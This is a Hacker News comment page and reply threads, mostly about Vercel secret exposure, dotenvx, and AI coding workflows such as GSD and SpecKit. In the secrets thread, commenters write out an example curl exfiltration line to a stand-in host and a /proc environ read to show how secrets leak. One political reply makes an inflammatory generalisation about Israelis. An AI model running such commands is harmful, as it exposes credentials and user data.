Hacker Newsnew | past | comments | ask | show | jobs | submit | yoaviram's commentslogin

I believe this is inaccurate. Vercel env vars are all encrypted at rest (on their side). The 'sensitive' checkbox means you can't retrieve the value once it's set, which would have saved your ass in this case. Also, annoying to read an article like this without a single link to source material.


They have an interesting UI decision here. The environmental variables list look like they are passwords (masked with a view button) and the sensitive flag is obvious in the add blade after you read the advisory but not before. We are busy rotating secrets because they were not marked as sensitive.


I think it's clear that some customers env vars got exposed, so that can only mean unencrypted, right?


They said "encrypted at rest", which they almost certainly are.

If you spin up an EC2 instance with an ftp server and check the "Encrypt my EBS volume" checkbox, all those files are 'encrypted at rest', but if your ftp password is 'admin/admin', your files will be exposed in plaintext quite quickly.

Vercel's backend is of course able to decrypt them too (or else it couldn't run your app for you), and so the attacker was able to view them, and presumably some other control on the backend made it so the sensitive ones can end up in your app, but can't be seen in whatever employee-only interface the attacker was viewing.


Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.


How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?


Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?


Keepass has an option to "encrypt in memory" certain passwords, sensitive information.

The point of encryption is often times about what other software or hardware attacks are minimized or eliminated.

However, if someone figures out access to a running system, theres really no way to both allow an app to run and keep everything encrypted. It certainly is possible, like the way keepass encrypts items in memory, but if an attacker has root on a server, they just wait for it to be accessed if not outright find the key that encrypted it.

This is to say, 99.9% of the apps and these platforms arn't secure against this type of low level intrusion.


Even Keepass's "encrypt in memory" option leaves that encryption key in memory, so it can auto-type or copy passphrases into form fields. It's an extra step, but not unbreakable.


And even then the passphrase is put into form fields in plaintext, so there's *got* to be some sort of attack to grab those. They must be in memory decrypted at some point.

It always comes back round to "you can't have your cake and eat it".


Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.

However I do feel now like my sensitive things are better off deployed on a VPS where someone would need a ssh exploit to come at me.


dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/

Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.

The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.


> If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext

Same for sops.

> The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend

The encrypted .env file is actually committed to source code, and the decryption key is placed in Vercel's environment variables dashboard. The attacker only gained access to the latter here if using dotenvx so they can't get your secrets. Unless they also gained access to the codebase in which they have terabytes of data to go through and match up private keys from the database with encrypted .env files from the source code exfiltration - much more effort for attackers.


Creator of dotenvx here.

There is no silver bullet, but Dotenvx splits your secrets into two separate locations.

1. The private decryption key - which lives on Vercel in this example 2. The encrypted .env file which lives in your source code pushed to Vercel

Attackers only got access to the first (as far as I know was reported). So your secrets would be safe in this attack if using Dotenvx. (A private key is useless without its corresponding encrypted .env file. Attackers need both.)

The whitepaper goes into the problem and solution in more detail: https://dotenvx.com/whitepaper.pdf


If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.

Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.

A running machine is not “at rest”, just like you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.


"encrypted at rest" is great to guard against stolen laptops, or in the server room both against people breaking in and stealing servers (unlikely at the security level of most hyperscalers, but possible) or more commonly broken HDDs being improperly disposed


How does that transalte to VMs? If "encryption at rest" is done at the guest level, instead of (or in addition to) host, that would be pretty close to minimal "encrypted except when it use" time and protect against virtual equivalents of pulling a hard drive out of a data center.


Env vars are not secure. Anything that has root access can see all env vars of all applications via /proc.

(And modern Linux is unusable without root access, thanks to Docker and other fast-and-loose approaches.)


How often do you log in as root, or use sudo to become root, when you're working with Docker containers?

Because I never do, unless I'm down in the depths of /var/lib/docker doing stuff I shouldn't.


That just means you outsourced the `sudo` invocations to some other person. (Which is even worse.)


No, it means I understand how Unix permissions work.


Glib response, but in reality you basically cannot do anything in a modern Linux system without root except read and write files in your home directory.


There isn't really a way around it.


There is -- you can expose a UNIX socket for serving credentials and allow access to it only from a whitelist of systemd services.


They would still exist in plaintext, just the permissions would make it a little harder to access.


No, UNIX sockets work over SSL too.

You can, theoretically, decompile the system memory dump and try to mine the credentials out of the credential server's heap, but that exploit is exponentially more difficult to do that a simple `cat /proc/1234/environ`.


That works on a single persistent box, but unfortunately, that means giving up on autoscaling, which is not so nice for cloud applications.


You can proxy the UNIX socket to a network server if you want to. You can even use SSL encryption at all times too.


Once it's networked you lose the "whitelist of systemd services" and it's then no different from any networked secret store.


No, this is a solved problem: https://spiffe.io/

You can do service attestation securely, even for networked services.


Nice. Really grateful for your participation in this comment tree

Run your own servers so the .env isn't shared with your hosting provider?


It seems only encrypt and throw away the key would be the acceptable strategy


They need to give your app the environment variables later so they cannot throw away the key.

For non-sensitive environment variables, they also show you the value in the dashboard so you can check and edit them later.

Things like 'NODE_ENV=production' vs 'NODE_ENV=development' is probably something the user wants to see, so that's another argument for letting the backend decrypt and display those values even ignoring the "running your app" part.

You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.


> You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

Piping to /dev/null is of course pointless.

What you really want is the /dev/null as a Service Enterprise plan for $500/month with its High Availability devnull Cluster ;)

https://devnull-as-a-service.com/pricing/


Then you might aswell write them to /dev/null. Safer, has the same effect and faster.


"If we bomb them some more, those poor citizens will surely realize that we're on their side"


Honestly I think we are already passed that.

Religious crazies have taken over Israel and they simply don't value the lives of non Jews. They want those poor citizens gone for more Semitic Lebensraum.


Apparently Anthropic downgraded cache TTL to 5 min without telling anyone. My biggest issue with the recent issues with Claude Code is the lack transparency, although it looks like even Boris doesn't know about one: https://news.ycombinator.com/item?id=47736476


I have a limited company and a nonprofit registered in Estonia and am about to register another company. I C can't recommend it enough. It's how it should be everywhere and the polar opposite of how it is in Italy, where i am based.


I've been using GSD extensively over the past 3 months. I previously used speckit, which I found lacking. GSD consistently gets me 95% of the way there on complex tasks. That's amazing. The last 5% is mostly "manual" testing. We've used GSD to build and launch a SaaS product including an agent-first CMS (whiteboar.it).

It's hard to say why GSD worked so much better for us than other similar frameworks, because the underlying models also improved considerably during the same period. What is clear is that it's a huge productivity boost over vanilla Claude Code.


Same. Have had great results with it. I got sick of paying FreshBooks monthly for basic income/expense tracking for Schedule C reporting and used GSD to build a macOS Swift app with Codex 5.4 and Opus 4.6. It’s working great and I am considering releasing it on the App Store. It started as a web app, but then I wanted screen capture from other windows for receipts in email or whatever. Then I wanted physical receipts, and so used Apple continuity camera. All working now in my app. And, I just added receipt auto-extract to pull salient info from and determine deduction category using Anthropic API.

Yes this is how much paying FreshBooks annoyed me. Plus I hated they forced an emailed 2FA if you didn’t connect with Google.


How much feature complete it is compared to Freshbooks?

Also, how much it is in terms of cost? Like - API costs?

Is it pure Swift? Or Electron app?


Your site whiteboar.it doesn't load properly on visit and on refresh, had to click on one of the footer links for it to somehow load. Terrible first impression. I can email you video if you want.


Yesterday I wrote a post about exactly this. Software development, as the act of manually producing code, is dying. A new discipline is being born. It is much closer to proper engineering.

Like an engineer overseeing the construction of a bridge, the job is not to lay bricks. It is to ensure the structure does not collapse.

The marginal cost of code is collapsing. That single fact changes everything.

https://nonstructured.com/zen-of-ai-coding/


> wrote

Quite a heavy-lifting word here. You understand why people flagged that post right? It's painfully non-human. I'm all for utilizing LLM, but I highly suggest you read Simon's posts. He's obviously a heavy AI user, but even his blog posts aren't that inorganic and that's why he became the new HN blog babe.

[0]: I personally believe Simon writes with his own voice, but who knows?


How paranoid do you want to get? Simone's written enough, such that you could just feed his blog to AI and ask it to write in his voice. Which, taken to the logical extreme, means that the last time he went to visit OpenAI, he was captured, and locked in a dungeon, and his online presence is now entirely AI with the right prompt. In fact, that's happened to everyone on this site, and we're all LLMs just predicting the next word at each other.

There's no actual way to determine if any words are from a silicon token generator or meat-based generator. It's not AI, it's human! Emdash. You're absolutely right!

system failure.


We have the entire web built on technical debt and LLMs mostly trained on that, what could go wrong? Cost will reside somewhere else if not on code


> It is much closer to proper engineering.

I would not equate software engineering to "proper" engineering insofar as being uttered in the same sentence as mechanical, chemical, or electrical engineering.

The cost of code is collapsing because web development is not broadly rigorous, robust software was never a priority, and everyone knows it. The people complaining that AI isn't good enough yet don't grasp that neither are many who are in the profession currently.


> The people complaining that AI isn't good enough yet don't grasp that neither are many who are in the profession currently.

I think the externalities are being ignored. Having time and money to train engineers is expensive. Having all the data of your users being stolen is a slap in the wrist.

So replacing those bad worekrs with AI is fine. Unless you remove the incentives to be fast instead of good, then yeah AI can be good enough for some cases.


Indeed, it's like those complaining self-driving cars occasionally crash when their crash rates are up to 90% less than humans . . .


You didn't write that and you shouldn't believe that you did.


This is such a strange take. Your words remind me of past crypto hype cycles, where people pushed web3.0 and NFT FOMO hysteria.

Engineering is the practical application of science and mathematics to solve problems. It sounds like you're maybe describing construction management instead. I'm not denying that there's value here, but what you're espousing seems divorced from reality. Good luck vibecoding a nontrivial actuarial model, then having it to pass the laundry list of reviews and having large firms actually pick it up.


> This is such a strange take. Your words remind me of past crypto hype cycles, where people pushed web3.0 and NFT FOMO hysteria.

Thats a little harsh. I think most everyone would agree we're in a transformative time for engineering. Sure theres hype, but the adoption in our profession (assuming you're an engineer) isn't waning.


It's not pleasant to read this.

    The claim here is profound: comprehension of the codebase at the function level is no longer necessary
It's not profound. It's not profound when I read the exact same awed blog post about how "agentic" is the future and you don't even need to know code anymore.

It wasn't profound the first time, and it's even dumber that people keep repeating it - maybe they take all the time they saved not writing, and use it to not read.


Stop putting forth your AI generated blog posts as your own work.


Agree. This is a transition from being "in" the loop to being "on" the loop.


The formal engineering disciplines are not defined by the construction vs design distinction so much as the regulatory gates they have passed and the ethical burdens they shoulder for society's benefit.

https://www.slater.dev/2025/09/its-time-to-license-software-...


I just finished writing a post about exactly this. Software development, as the act of manually producing code, is dying. A new discipline is being born. It is much closer to proper engineering.

Like an engineer overseeing the construction of a bridge, the job is not to lay bricks. It is to ensure the structure does not collapse.

The marginal cost of code is collapsing. That single fact changes everything.

https://nonstructured.com/zen-of-ai-coding/


> I just finished writing a post about exactly this. Software development, as the act of manually producing code, is dying.

It was never that. Take any textbook on software engineering and the focus was never the code, but on systems design and correctness. I'm looking at the table of contents of one (Software Engineering by David C. Kung) and these are a few sample chapters:

  ...
  4. Software Requirement Elicitation
  5. Domain Modelling
  6. Architectural Design
  ...  
  8. Actor-System Interaction Modeling
  9. Object Interaction Modeling
  ...
  15. Modeling and Design of Rule-Based Systems
  ...
  19. Software Quality Assurance
  ...
  24. Software Security
What you're talking about was coding, which has never been the bottleneck other than for beginners in some programming languages.


Our CEO, an expert in marketing has discovered Claude Code and is the one having the most open PR of all developers and is pushing for us to « quickly review ». He does not understand why review are so slow because it’s « the easiest part ». We live in a new world.


In what world do these new tools help with "laying bricks", but not with ensuring that the structure does not collapse? How is that work any more difficult than producing the software in the first place? It wasn't that long ago that these tools could barely produce a simple program. If you're buying into the promises of this tech, then what's stopping it from also being able to handle those managerial tasks much better than a human?

The seemingly profound points of your marketing slop article ignore that these new tools are not a higher level of abstraction, but a replacement of all cognitive work. The tech is coming for your job just as it is coming for the job of the "bricklayer" you think is now worthless. The work you're enjoying now is just a temporary transition period, not an indication of the future of this industry.

If you enjoy managing a system that hallucinates solutions and disregards every other instruction, that's great. When you reach a dead end with that approach, and the software is exposing customer data, or failing in unpredictable ways, hopefully you know some good "bricklayers" that can help you with that.


Accountability then


Anticipating modes of failure, creating tooling to identify and hedge against risks.


If we could do this it would have been done already. Outsourced devs would be ubiquitous.


This thread reads like an advertisement for ChatGPT Health.

I came to share a blog post I just posted titled: "ChatGPT Health is a Marketplace, Guess Who is the Product?"

OpenAI is building ChatGPT Health as a healthcare marketplace where providers and insurers can reach users with detailed health profiles, powered by a partner whose primary clients are insurance companies. Despite the privacy reassurances, your health data sits outside HIPAA protection, in the hands of a company facing massive financial pressure to monetize everything it can.

https://consciousdigital.org/chatgpt-health-is-a-marketplace...


> This thread reads like an advertisement for ChatGPT Health.

This thread has a theme I see a lot in ChatGPT users: They're highly skeptical of the answers other people get from ChatGPT, but when they use it for themselves they believe the output is correct and helpful.

I've written before on HN about my friend who decided to take his health into his own hands because he trusted ChatGPT more than his doctors. By the end he was on so many supplements and "protocols" that he was doing enormous damage to his liver and immune system.

The more he conversed with ChatGPT, the better he got at getting it to agree with him. When it started to disagree or advise caution, he'd blame it on overly sensitive guardrails, delete the conversation, and start over with an adjusted prompt. He'd repeat this until he had something to copy and paste to us to "prove" that he was on the right track.

As a broader anecdote, I'm seeing "I thought I had ADHD and ChatGPT agrees!" at an alarming rate in a couple communities I'm in with a lot of younger people. This combined with the TikTok trend of diagnosing everything as a symptom of ADHD is becoming really alarming. In some cohorts, it's a rarity for someone to believe they don't have ADHD. There are also a lot of complaints from people who are angry their GP wouldn't just write a prescription for Adderall and tips for doctor shopping around to find doctors who won't ask too many questions before dispensing prescriptions.


> I'm seeing "I thought I had ADHD and ChatGPT agrees!" at an alarming rate in a couple communities I'm in with a lot of younger people

This may be caused by ChatGPT response patterns but doesn't necessarily mean there is an increase of false (self-)diagnoses. The question is: What is alarming about the increasing rate of diagnoses?

There has been an increase of positive diagnoses over the last decades that have been partially attributed to adult diagnoses that weren't common until (after) the 1990s and the fact that non-male patients often remained undiagnosed because of a stereotypical view on ADHD.

If the diagnosis helps, then it's a good thing! If it turns out that 10% of the population are ADHDers then let's see how we can change our environment that reflects that fact. In many cases, meds aren't needed as much when public spaces provide the necessary facilities to retreat for a few minutes, wear headphones, chew gum or fidget.

The story of your friend sounds very bad and I share your point here, completely. But concerning ADHD, I still don't see what's bad about the current wave of self-diagnoses. If people buy meds illegally, use ChatGPT as a therapist, etc. THAT is a problem. But not identifying with ADHD itself (same for Autism, Depression, Anxiety and so on).

ADHD may or may even be a reinforcing factor for a LLM user to be convinced by the novelty of the tool - but that would have to be empirically evaluated. If it were so, then this could even contribute to a better rate of diagnoses without ChatGPT capabilities in this field contributing much to the effect. Many ADHDers suffer from failing at certain aspects of daily life over and over and advice that helps others only makes them feel worse because it doesn't work for them (e.g. building habits or rewarding oneself for reaching a milestone can be much more difficult for ADHDers than non-ADHDers). I'm just guessing here and this doesn't count for all ADHDers, but: Whenever a new and possibly fun tool comes along that feels like an improvement, there can be a spark of enthusiasm that may lead to an increased trust. This usually decreases after a while and I guess giving LLMs a bit more time of being around, the popularity in this field may also decrease.


I don't see why they shouldn't be sued by misleading people with such products


Great write up. I'd even double down on this statement: "You can opt in to chat history privacy". This is really "You can opt in to chat history privacy on a chat-by-chat basis, and there is no way to set a default opt-out for new chats".


This. It’s the same play with their browser. They are building the most comprehensive data profile on their users and people are paying them to do it.


Is this any worse than Google? Seems like the same business model.


There are lots of companies that do this. Doesn't make it right.

The real "evil" here is that companies like Meta, Google, and now OpenAI sell people a product or service that the customer thinks is the full transaction. I search with Google, they show me ads - that's the transaction. I pay for Chatgpt, it helps me understand XYZ - that's the transaction.

But it isn't. You give them your data and they sell it - that's the transaction. And that obscurity is not ethical in my opinion.


> You give them your data and they sell it - that's the transaction

I think that's the wrong framing. Let's get real: They're pimping you out. Google and Meta are population-scale fully-automated digital pimping operations.

They're putting everyone's ass on the RTB street and in return you get this nice handbag--err, email account/YouTube video/Insta feed. They use their bitches' data to run an extremely sophisticated matchmaking service, ensuring the advertiser Johns always get to (mind)fuck the bitches they think are the hottest.

What's even more concerning about OpenAI in particular is they're poised to be the biggest, baddest, most exploitative pimp in world history. Instead of merely making their hoes turn tricks to get access to software and information, they'll charge a premium to Johns to exert an influence on the bitches and groom them to believe whatever the richest John wants.

Goodbye democracy, hello pimp-ocracy. RTB pimping is already a critical national security threat. Now AI grooming is a looming self-governance catastrophe.


I think you just wrote a treatment for the next HBO Max sunday drama


And it's not only your data, that makes it much worse.

"You are the product" is a good catchphrase to make people understand. But actually when you search or interact with LLMs, you provide not only primary data about yourself but also about other people by searching for them in connection with specific search terms, by using these services from your friend's house which connects you to their IP-Address, by uploading photos of other people etc.

"You are the product and you come with batteries (your friends)."


Does Google have your medical records? It doesn't have mine.


They tried to at one point with "google health". They are still somewhat trying to get that information with the fitbit acquisition.


People email about their medical issues and google for medical help using Gmail/Google Search. So yes, Google has people's medical records.


If you hear me talking to someone about needing to pick up some flu medicine after work do you have my medical records?


No, but if I hear you telling someone you have the flu and are picking up flu medicine after work then I have a portion of your medical records. Why is it hard for people on HN to believe that normal people do not protect their medical data and email about it or search Google for their conditions? People in the "real world" hook up smart TV's to the internet and don't realize they are being tracked. They use cars with smart features that let them be tracked. They have apps on their phone that track their sentiments, purchases, and health issues... All we are seeing here is people getting access to smart technology for their health issues in such a manner that they might lower their healthcare costs. If you are an American you can appreciate ANY effort in that direction.


Maybe stop by to consider that knowing a few scattered facts and having your complete medical records is not the same thing, Hemingway.


how do you know they don't?


Since when is Google the model to emulate?


Depends on your goals. If you are starting a business and you see a company surpass the market cap of Apple, again, then you might view their business model as successful. If you are a privacy advocate then you will hate their model.


Well you said "is this any _worse_" (emphasis mine) and I could only assume you meant ethically worse. At which point the answer is kind of obvious because Google hasn't proven to be the most ethical company w.r.t. user data (and lots of other things).


since always


May your piece stay at the highest level of this comment section.


I get that impression too - but also it's HN and enthusiastic early adoption is unsurprising.

My concern, and the reason I would not use it myself, is the alto frequent skirting of externalities. For every person who says "I can think for myself and therefore understand if GPT is lying to me," there are ten others who will take it as gospel.

The worry I have isn't that people are misled - this happens all the time especially in alternative and contrarian circles (anti-vaxx, homeopathy, etc.) - it's the impact it has on medical professionals who are already overworked who will have to deal with people's commitment to an LLM-based diagnosis.

The patient who blindly trusts what GPT says is going to be the patient who argues tooth and nail with their doctor about GPT being an expert, because they're not power users who understand the technical underpinnings of an LLM.

Of course, my angle completely ignores the disruption angle - tech and insurance working hand in hand to undercut regulation, before it eventually pulls the rug.


Sharing my experience with SpecKit in case anyone finds it useful.

I've been using Speckit for the last two weeks with Claude Code, on two different projects. Both are new code bases. It's just me coding on these projects, so I don't mind experimenting.

The first one was just speckit doing its thing. It took about 10 days to complete all the tasks and call the job done. When it finished, there was still a huge gap. Most tests were failing, and the build was not successful. I had to spend an equally long, excruciating time guiding it on how to fix the tests. This was a terrible experience, and my confidence in the code is low because Claude kept rewriting and patching it with many fixes to one thing, breaking another.

For the second project, I wanted to iterate in smaller chunks. So after SpecKit finished its planning, I added a few slash commands of my own. 1) generate a backlog.md file based on tasks.md so that I don't mess with SpecKit internals. 2) plan-sprint to generate a sprint file with a sprint goal and selected tasks with more detail. 3) implement-sprint broadly based on the implement command.

This setup failed as the implement-sprint command did not follow the process despite several revisions. After implementing some tasks, it would forget to create or run tests, or even implement a task.

I then modified the setup and created a subagent to handle task-specific coding. This is easy, as all the context is stored in SpecKit files. The implement-sprint functions as an orchestrator. This is much more manageable because I get to review each sprint rather than the whole project. There are still many cases where it declares the sprint as done even though tests still fail. But it's much easier to fix, and my level of trust in the code is significantly higher.

My hypothesis now is that Claude is bed at TDD. It almost always has to go back and fix the tests, not the implementation. My next experiment is going to be to create the tests after the implementation. This is not ideal, but at this point, I'd rather gain velocity, since it would be faster for me to code it myself.


Essentially what this article is asking for, in most cases, is a better UI/UX for one of the foundation models.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: